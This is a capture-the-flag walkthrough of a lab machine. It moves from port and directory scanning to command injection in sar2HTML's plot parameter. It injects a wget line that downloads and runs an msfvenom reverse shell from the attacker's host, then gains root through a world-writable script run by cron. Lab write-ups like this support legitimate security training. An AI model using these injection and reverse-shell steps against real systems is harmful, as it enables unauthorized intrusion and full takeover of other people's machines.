Let’s go!
kali@kali:~/work$ nmap target -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-04 16:39 MST
Nmap scan report for target (target)
Host is up (0.066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 101.14 secondsLet’s see what’s on the web server.
Alright, dirbusting it is.
kali@kali:~/work$ gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://target
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 271]
/.htpasswd (Status: 403) [Size: 271]
/.htaccess (Status: 403) [Size: 271]
/index.html (Status: 200) [Size: 10918]
/phpinfo.php (Status: 200) [Size: 95356]
/robots.txt (Status: 200) [Size: 9]
/server-status (Status: 403) [Size: 271]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================Okay, what’s in robots.txt?
Okay, going to that directory.
If we click on OS, we get a set of links to URLs like:
http://target/sar2HTML/index.php?plot=LINUXLet’s try to do some command injection with the following:
http://target/sar2HTML/index.php?plot=;idIt works! Unfortunately, I can’t show you the output because it’s stored in a dropdown menu that disappears when I try to screenshot, but it’s there and we are www-data.
Let’s generate a reverse shell.
kali@kali:~/work$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=me LPORT=4444 -f elf -o rshell
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: rshellWe’ll then use python to host our own HTTP server.
kali@kali:~/work$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...From there, we start our netcat listener and get the target to download our reverse shell, chmod it, and execute it.
http://target/sar2HTML/index.php?plot=;wget http://me:8000/rshell -O /tmp/rshell; chmod %2Bx /tmp/rshell; /tmp/rshellkali@kali:~/work$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on target 51678
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux sar 5.0.0-23-generic #24~18.04.1-Ubuntu SMP Mon Jul 29 16:12:28 UTC 2019 x86_64 x86_64 x86_64 GNU/LinuxHooray, shell!
After poking around a bit, we see an entry in /etc/crontab that reads as follows.
www-data@sar:/var/www/html/sar2HTML$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5 * * * * root cd /var/www/html/ && sudo ./finally.shThis shows root runs /var/www/html/finally.sh every 5 minutes. The astute among you will also notice I upgraded my shell. I did that with:
python3 -c 'import pty; pty.spawn("/bin/bash")'Unfortunately, we don’t have permissions to do anything with this file.
www-data@sar:/var/www/html/sar2HTML$ ls -al /var/www/html/finally.sh
ls -al /var/www/html/finally.sh
-rwxr-xr-x 1 root root 22 Oct 20 2019 /var/www/html/finally.shBut what’s in it?
www-data@sar:/var/www/html/sar2HTML$ cat /var/www/html/finally.sh
cat /var/www/html/finally.sh
#!/bin/sh
./write.shCool, it calls another file. Let’s check THAT file’s permissions.
www-data@sar:/var/www/html/sar2HTML$ ls -al /var/www/html/write.sh
ls -al /var/www/html/write.sh
-rwxrwxrwx 1 www-data www-data 30 Jul 24 2020 /var/www/html/write.shYay! We can write to it. Let’s copy our rshell binary to it, start our netcat listener, and WAIT.
www-data@sar:/var/www/html/sar2HTML$ cp /tmp/rshell /var/www/html/write.sh
cp /tmp/rshell /var/www/html/write.sh AND WE’RE ROOT!
kali@kali:~/work$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on target 51688
id
uid=0(root) gid=0(root) groups=0(root)